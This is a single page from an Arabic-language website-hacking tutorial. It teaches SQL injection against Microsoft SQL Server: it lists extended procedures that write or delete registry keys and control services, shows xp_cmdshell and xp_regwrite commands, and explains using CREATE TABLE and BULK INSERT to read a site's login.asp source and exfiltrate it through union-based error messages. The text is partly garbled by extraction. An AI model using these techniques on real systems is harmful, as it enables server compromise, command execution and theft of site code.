Page 239 - بسم الله الرحمن الرحيم

P. 239

‫| ‪ |----xp_regdeletekey‬حذف مفتا ح من‬
‫الريجستري‪|-------------------------------------------------‬‬

‫| ‪ |-xp_regdeletevalue‬حذف قيمة مفتا ح من‬
‫الريجستري‪|--------------------------------------------‬‬

‫| ‪ |---------- xp_regwrite‬للكتابة في‬
‫الريجستري‪|-------------------------------------------------------‬‬

‫| ‪ |--xp_servicecontrol‬لبدأ أو أنهاء ختدمة على‬
‫السيرفر‪|--------------------------------------------‬‬

‫‪----------------------------+‬‬
‫‪+-----------------------------------------------------------------------------+‬‬

‫أما طريقة الستفاده من أي من هذه الـ ‪ Procedure‬فهي بالشكل التالي‬
‫'‪exec master..xp_cmdshell 'dir‬‬

‫هذا مثال لطريقة أستخدا‪.‬م ‪ xp_cmdshell‬والبقيه مثله‬
‫عدا الكتابة في الريجستري فهو بالشكل التالي‬

‫'‪exec master..xp_regwrite 'REGISTERY KEY' VALUE‬‬

‫أيضا بقي الشاره إلى أنه بأمكانك قراءة كود ملفات ‪ asp‬التي يعمل عليها الموقع عن طريق إضافة جهدول‬
‫جهديد ومن ثم نسخ كود صفحة ‪ asp‬ووضعه‬

‫في هذا الجدول بالطريقة التاليه‬
‫))‪CREAT TABLE M_3 ( source varchar(8000‬‬
‫هذا السطر يقو‪.‬م ببناء الجدول وأسم الجدول ‪ M_3‬وبداختله عمود واحد من النوع ‪ varchar‬حجمه ‪8000‬‬

‫بايت‬
‫بعد ذلك بأمكانك الن إضافة أي ملف على السيرفر إلى هذا الجدول ومن ثم قرائته بالشكل التالي‬

‫'‪bulk insert M_3 from 'c:\InetPub\wwwroot\login‬‬
‫‪asp.‬‬

‫ولقرائة ما تصم نسخه يمكنك ذلك عن طريق رسائل الخطأ اللي تصكلمنا عنها في الموضوع السابق‬
‫أسهلها هو عمل ‪ union‬حيث يتم تصوليد رسالة ختطأ بها ما تصم نسخه‪.‬‬

‫انتهى‪،،،‬‬

‫" درس لحتراف الهاك في اختتراق المواقع "‬

‫‪239‬‬

234 235 236 237 238 239 240 241 242 243 244